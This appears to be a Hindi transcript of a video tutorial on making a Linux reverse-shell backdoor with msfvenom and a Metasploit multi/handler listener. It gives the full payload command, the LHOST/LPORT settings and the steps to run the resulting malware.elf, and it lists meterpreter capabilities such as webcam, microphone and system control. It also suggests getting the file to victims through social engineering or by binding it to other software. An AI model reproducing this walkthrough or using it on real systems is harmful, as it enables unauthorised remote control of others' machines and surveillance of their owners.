तो अब हम देखते हैं किसी मालवेयर को कैसे क्रिएट किया जाता है, उसके थ्रू हम कैसे बैकडोर क्रिएट करते हैं। तो उसके लिए सबसे पहले मैं डेस्कटॉप में आ जाता हूँ अपनी डायरेक्टरी में, और यहाँ पर हम यूज़ करेंगे MSF Venom का। हम इसके ज़रिए से पेलोड मालवेयर क्रिएट करेंगे। तो MSF Venom -P, और मैं लिनक्स के लिए क्रिएट कर रहा हूँ, तो linux/, और हमने कितने बिट का ऑपरेटिंग सिस्टम है वो डिसाइड करना है। तो मेरे तो अभी 64 है, तो मैं x64 लिख दिया, नहीं तो x86 32 बिट के लिए, तो उसके आगे /metapleter और फिर /reverse_, फिर हमारे पास आ जाएगा TCP। हम रिवर्स कनेक्शन बनाना चाह रहे हैं मेटाप्लेटर सेशन। तो इसके बाद हम अपने सिस्टम की IP देखेंगे। मैं लोकली ये सिस्टम अटैक कर रहा हूँ, तो ifconfig, हमारी IP को हम देख लेते हैं, और यहाँ पर lhost = और इसको हम ड्रैग एंड ड्रॉप कर देते हैं। इसके बाद हमने L पोर्ट देनी होगी, तो L पोर्ट = ये मैं दे देता हूँ 4433। तो इसके बाद हमने फाइल का फॉर्मेट, मैं ELF लिनक्स को हैक करा, तो ELF फॉर्मेट दिया है, इसलिए इसके बाद -O यानी आउटपुट फाइल के लिए। तो मैं इसका नेम मालवेयर रख देता हूँ, malware.elf। तो एक्सटेंशन भी वही आएगी जो हमारी फाइल का फॉर्मेट होगा। तो इसको एंटर, कुछ ही सेकंड में ये पेलोड जो है वो क्रिएट कर देगा हमारे लिए, जिसको हमने टारगेट ऑपरेटिंग सिस्टम तक पहुंचाना है। ये लिनक्स के लिए क्रिएट किया, तो लिनक्स ऑपरेटिंग सिस्टम पर ही पहुंचाना होगा। तो ये किसी भी तरह से आप कर सकते हैं, सोशल इंजीनियरिंग वगैरह, या फिर डायरेक्ट आप सेंड कर सकते हैं किसी और एप्लीकेशन के साथ बाइंड करके। तो हम पहले लिसनर को स्टार्ट कर देते हैं। MSF कंसोल लिखा है मैंने, मेटास्प्लॉइट को मैं एग्जीक्यूट कर रहा हूँ MSF कंसोल लिख के। तो देखें MSF कंसोल हमारा ओपन हो चुका है। हम मल्टी हैंडलर का यूज़ करेंगे, यूज़ मल्टी /हैंडलर, इंटर कर देंगे। तो अब हमें इसकी पेलोड और lhost और lport, ये 3 चीज़ें सेट करनी पड़ेंगी। मल्टी हैंडलर हमने सेट कर दिया, तो अब हम सेट पेलोड करते हैं, सेट पेलोड। और फिर हमारी जो पेलोड थी लिनक्स x64 और मेटाप्लेटर रिवर्स TCP, हम इसको यहाँ से ड्रैग एंड ड्रॉप कर देते हैं, इंटर कर देते हैं। तो ये पेलोड हमारी सेट हो चुकी है। इसके बाद हम दोबारा lhost को सेट करेंगे। मैं लोकल सिस्टम पे अटैक कर रहा हूँ, तो लोकल IP, इसको भी ड्रैग एंड ड्रॉप कर दिया हमने, इंटर। और lport भी हमने वही देनी है जो हमने पेलोड बनाते टाइम दी थी, क्योंकि हम लोकल सिस्टम पे अटैक कर रहे हैं। तो lport हमने दी थी 4433। तो लिख लेते हैं सेट lport, और यहाँ पर 4433। तो ये तीनों चीज़ें सेट हो चुकी हैं। अब हम इसे एक्सप्लॉइट कर देते हैं। तो ये लिसनर स्टार्ट हो चुका है, रिवर्स TCP हैंडलर जो हमारा स्टार्ट हो चुका है। अब विक्टिम तक हमें किसी भी तरह फाइल पहुंचानी होगी। जैसे वो इसे रन करेगा तो हमारा सेशन बन जाएगा। फिलहाल हम इसे रन करके देख लेते हैं अपने सिस्टम पर। malware.elf /malware, ये देखें परमिशन डिनाइड आ रहा है, क्योंकि हमें इसे परमिशन देनी पड़ेगी। तो उसके लिए chmod
उसके बाद +X और फाइल का नेम malware.elf। तो अगेन ./ malware.elf देखें बैकग्राउंड में हमारे पास का सेशन जो है वो ओपन हो चुका है। ये देखें सेशन 1 ओपन। हेल्प टाइप कर दें कौन कौन सी कमांड हम एग्जीक्यूट कर सकते हैं, दे क्या क्या कुछ सिस्टम के साथ कर सकते हैं। सब लिस्ट आ गई है तो उसे बड़ा कर लेते हैं स्क्रीन को। और यहाँ पे देखें बैकग्राउंड वगैरह में आप डाल सकते हैं सेशन को, माइक स्टार्ट कर सकते हैं, वेब कैम वगैरह, लोकल टाइम, कोई प्रोसेस को किल करना, सिस्टम इन्फो देख लेते हैं। इसको मैंने ड्रैग एंड ड्रॉप कर दिया, इंटर करते हैं। देखिए काली लिनक्स को बता रहा है कौन सा ऑपरेटिंग सिस्टम, कौन सा उसका वर्जन है, कितने बिट का इंस्टॉल है वो भी बता रहा है, 64 है वो। तो ये देखिए लोकल टाइम, उस डिवाइस का करंट लोकल टाइम देखने के लिए देखिए इसका लोकल टाइम, डेट एंड टाइम आ गया है। तो इस तरह काफ़ी सारी कमांड है जिनके थ्रू कंट्रोल किया जा सकता है सिस्टम को, डिपेंड करता है ऑपरेटिंग सिस्टम के ऊपर। तो यहाँ पर ये गेट यूआईडी यानी गेट यूज़र आईडी है, तो हम इसे भी ट्राई करते हैं। तो ये देखें इंटर किया तो देखें सर्वर का यूज़र नेम उसने रूट बता दिया कि फ़िलहाल आपका जो यूज़र है वो रूट है। यहाँ पर कमांड वाला अलग अलग सेक्शन बने हुए हैं, नेटवर्किंग की कमांड है, फिर नीचे सिस्टम की कमांड है, नीचे वेब कैम कमांड है, नीचे माइक कमांड है। तो आप अपने हिसाब से इसे यूज़ कर सकते हैं। तो मैं इसे फ़िलहाल बंद कर देता हूँ, Ctrl+Z, Y इंटर, रिकॉर्डिंग पॉज करते हैं। अल्लाह हाफिज़।